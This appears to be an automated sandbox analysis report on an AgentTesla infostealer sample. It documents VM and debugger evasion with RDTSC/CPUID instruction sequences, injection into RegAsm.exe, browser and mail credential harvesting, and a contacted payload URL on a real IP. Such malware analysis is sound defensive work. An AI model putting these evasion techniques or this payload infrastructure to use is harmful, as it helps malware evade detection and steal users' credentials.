          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0130210C 4_2_0130210C
          Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 0000000002102FA2 second address: 0000000002102FA2 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F7E70A9D098h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d test bl, dl 0x0000001f cmp eax, ebx 0x00000021 pop ecx 0x00000022 test ebx, ecx 0x00000024 add edi, edx 0x00000026 dec ecx 0x00000027 pushad 0x00000028 mov ah, F0h 0x0000002a cmp ah, FFFFFFF0h 0x0000002d jne 00007F7E70A9C5A5h 0x00000033 popad 0x00000034 cmp ecx, 00000000h 0x00000037 jne 00007F7E70A9D043h 0x00000039 push ecx 0x0000003a jmp 00007F7E70A9D0AAh 0x0000003c push esi 0x0000003d mov esi, 6EF0E26Ch 0x00000042 cmp esi, 6EF0E26Ch 0x00000048 jne 00007F7E70A9A718h 0x0000004e pop esi 0x0000004f call 00007F7E70A9D0E7h 0x00000054 call 00007F7E70A9D0A8h 0x00000059 lfence 0x0000005c mov edx, dword ptr [7FFE0014h] 0x00000062 lfence 0x00000065 ret 0x00000066 mov esi, edx 0x00000068 pushad 0x00000069 rdtsc
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 00000000021006BA second address: 00000000021006BA instructions:
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 0000000002100853 second address: 0000000002100853 instructions:
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000001300F6A second address: 0000000001300F6A instructions:
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000001301F08 second address: 0000000001301F08 instructions:
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Tries to detect Any.runShow sources
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: RegAsm.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 0000000002102FA2 second address: 0000000002102FA2 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F7E70A9D098h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d test bl, dl 0x0000001f cmp eax, ebx 0x00000021 pop ecx 0x00000022 test ebx, ecx 0x00000024 add edi, edx 0x00000026 dec ecx 0x00000027 pushad 0x00000028 mov ah, F0h 0x0000002a cmp ah, FFFFFFF0h 0x0000002d jne 00007F7E70A9C5A5h 0x00000033 popad 0x00000034 cmp ecx, 00000000h 0x00000037 jne 00007F7E70A9D043h 0x00000039 push ecx 0x0000003a jmp 00007F7E70A9D0AAh 0x0000003c push esi 0x0000003d mov esi, 6EF0E26Ch 0x00000042 cmp esi, 6EF0E26Ch 0x00000048 jne 00007F7E70A9A718h 0x0000004e pop esi 0x0000004f call 00007F7E70A9D0E7h 0x00000054 call 00007F7E70A9D0A8h 0x00000059 lfence 0x0000005c mov edx, dword ptr [7FFE0014h] 0x00000062 lfence 0x00000065 ret 0x00000066 mov esi, edx 0x00000068 pushad 0x00000069 rdtsc
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 000000000210319A second address: 000000000210319A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F7E70AAA270h 0x0000001d popad 0x0000001e jmp 00007F7E70AA7922h 0x00000020 test ax, dx 0x00000023 call 00007F7E70AA7934h 0x00000028 lfence 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 00000000021006BA second address: 00000000021006BA instructions:
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeRDTSC instruction interceptor: First address: 0000000002100853 second address: 0000000002100853 instructions:
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 000000000130319A second address: 000000000130319A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F7E70A9FA00h 0x0000001d popad 0x0000001e jmp 00007F7E70A9D0B2h 0x00000020 test ax, dx 0x00000023 call 00007F7E70A9D0C4h 0x00000028 lfence 0x0000002b rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000001300F6A second address: 0000000001300F6A instructions:
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000001301F08 second address: 0000000001301F08 instructions:
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0130210C rdtsc 4_2_0130210C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2357Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7483Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6904Thread sleep time: -25825441703193356s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: RegAsm.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0130210C rdtsc 4_2_0130210C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FE6B68 LdrInitializeThunk,4_2_00FE6B68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_013052A0 mov eax, dword ptr fs:[00000030h]4_2_013052A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01302DD2 mov eax, dword ptr fs:[00000030h]4_2_01302DD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01305F0E mov eax, dword ptr fs:[00000030h]4_2_01305F0E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0130576C mov eax, dword ptr fs:[00000030h]4_2_0130576C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01305EF3 mov eax, dword ptr fs:[00000030h]4_2_01305EF3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1300000Jump to behavior
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe' Jump to behavior
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01302214 cpuid 4_2_01302214
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Virtualization/Sandbox Evasion34OS Credential Dumping1Security Software Discovery731Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion34Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery424SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

          Behavior Graph

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SKM_C3350191107102300.exe22%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://DynDns.comDynDNS0%URL Reputationsafe
          http://DynDns.comDynDNS0%URL Reputationsafe
          http://DynDns.comDynDNS0%URL Reputationsafe
          http://DynDns.comDynDNS0%URL Reputationsafe
          http://sHYyUE.com0%VirustotalBrowse
          http://sHYyUE.com0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
          http://185.222.58.152/EDUORIGIN_baxLdLkc20.bin0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://185.222.58.152/EDUORIGIN_baxLdLkc20.bintrue
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          low
          http://DynDns.comDynDNSRegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://sHYyUE.comRegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          185.222.58.152
          unknownNetherlands
          51447ROOTLAYERNETNLtrue

          General Information

          Joe Sandbox Version:31.0.0 Emerald
          Analysis ID:356107
          Start date:22.02.2021
          Start time:15:17:08
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 5m 56s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:SKM_C3350191107102300.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:24
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.rans.troj.spyw.evad.winEXE@4/0@0/1
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 21.1% (good quality ratio 15.9%)
          • Quality average: 37.3%
          • Quality standard deviation: 30.4%
          HCA Information:
          • Successful, ratio: 97%
          • Number of executed functions: 88
          • Number of non-executed functions: 16
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          15:18:31API Interceptor656x Sleep call for process: RegAsm.exe modified

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          ROOTLAYERNETNLJagtap Trading - order #JEW-39-16.02.2021.exeGet hashmaliciousBrowse
          • 45.137.22.36
          AKBANK E-DEKONT.exeGet hashmaliciousBrowse
          • 45.137.22.52
          New Order.exeGet hashmaliciousBrowse
          • 45.137.22.102
          New Order.exeGet hashmaliciousBrowse
          • 45.137.22.102
          LnkxrWO6yvd9qaJ.exeGet hashmaliciousBrowse
          • 185.222.58.156
          tuesdacrypted.exeGet hashmaliciousBrowse
          • 185.222.57.68
          000009000000900.exeGet hashmaliciousBrowse
          • 45.137.22.52
          TT.exeGet hashmaliciousBrowse
          • 185.222.57.213
          Cotizaci#U00f3n de factura.exeGet hashmaliciousBrowse
          • 45.137.22.52
          kart-009000000..pdf...exeGet hashmaliciousBrowse
          • 45.137.22.52
          PO-OIOI09000.exeGet hashmaliciousBrowse
          • 45.137.22.52
          090000090000-090.exeGet hashmaliciousBrowse
          • 45.137.22.52
          kart gecmisi.exeGet hashmaliciousBrowse
          • 45.137.22.52
          000000000900R.exeGet hashmaliciousBrowse
          • 45.137.22.52
          0000000000009000.exeGet hashmaliciousBrowse
          • 45.137.22.52
          090887000008000000.exeGet hashmaliciousBrowse
          • 45.137.22.52
          PURCHASE ORDER098090.exeGet hashmaliciousBrowse
          • 45.137.22.52
          rawwwwwwwcrypted.exeGet hashmaliciousBrowse
          • 185.222.57.68
          REMOUOOO9O9.exeGet hashmaliciousBrowse
          • 45.137.22.52
          RFQ-OM-3994 - Closing Date 31.12.2020 - MEPF-PO-2020-060PDF.exeGet hashmaliciousBrowse
          • 185.222.58.156

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          No created / dropped files found

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):4.793930759240635
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.15%
          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:SKM_C3350191107102300.exe
          File size:61440
          MD5:58bb0368bc9cf6ec86c266f54cdefeeb
          SHA1:1b9beee4bf56a4d5b31654b7c7404df5ff13f2fe
          SHA256:d8eb1f98c2e365646d4b849ce9463769f173f7b4c95ea4dc705429a1798e1cfb
          SHA512:3078cfa6d4bfd47981bdac73d8cd41a4d37a8a076d01920dea680f643e683d07750ad9ee623976df6f4df76ccf37d03ae8899e7a88b976a3d28409735e936343
          SSDEEP:768:IZH/LgmvpoLA7SIKJrj7+I6vbfzrkEiV:mz5yLA7SIKZ6vTc
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...m?.V.....................0....................@................

          File Icon

          Icon Hash:20047c7c70f0e004

          Static PE Info

          General

          Entrypoint:0x4012c4
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          DLL Characteristics:
          Time Stamp:0x56A83F6D [Wed Jan 27 03:54:21 2016 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f8fb5be8a6ea86fb9d04da61d8bfeb3a

          Entrypoint Preview

          Instruction
          push 00401504h
          call 00007F7E70845993h
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          xor byte ptr [eax], al
          add byte ptr [eax], al
          cmp byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          xchg eax, ebx
          mov eax, dword ptr [E42F2C80h]
          inc edi
          popfd
          add al, 37h
          adc byte ptr [eax], 0000005Ah
          mov edi, 0000006Ah
          add byte ptr [eax], al
          add byte ptr [ecx], al
          add byte ptr [eax], al
          add byte ptr [eax+00h], cl
          push es
          inc eax
          add dword ptr [ecx], 41h
          insb
          outsb
          add byte ptr [esi+000002FBh], dh
          add byte ptr [eax], al
          dec esp
          xor dword ptr [eax], eax
          pop es
          mov dh, 00h
          pop edi
          retf 9645h
          dec esi
          mov ecx, dword ptr [edi-2EF3FE6Eh]
          mov dword ptr [ebp-42h], edi
          pop es
          xchg eax, ebx
          adc al, 08h
          movsd
          loopne 00007F7E708459EAh
          stosd
          cdq
          clts
          mov ch, B4h
          clc
          ret
          cmp cl, byte ptr [edi-53h]
          xor ebx, dword ptr [ecx-48EE309Ah]
          or al, 00h
          stosb
          add byte ptr [eax-2Dh], ah
          xchg eax, ebx
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          xchg eax, ebp
          add dword ptr [eax], eax
          add byte ptr [ebx+00h], cl
          add byte ptr [eax], al
          add byte ptr [ebx], cl
          add byte ptr [edx+49h], al
          dec esp
          inc ecx
          inc edi
          inc esp
          inc ebp
          push ebx
          push ebx
          dec esi
          inc ebp
          add byte ptr [52000901h], cl
          inc ebp
          inc esi
          inc ebp
          inc ebx
          push esp
          dec edi
          push edx
          dec ecx
          add byte ptr [ecx], bl

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0xc0240x28.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x9b4.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
          IMAGE_DIRECTORY_ENTRY_IAT0x10000xd0.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000xb3f80xc000False0.454182942708data5.50136713696IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .data0xd0000x118c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
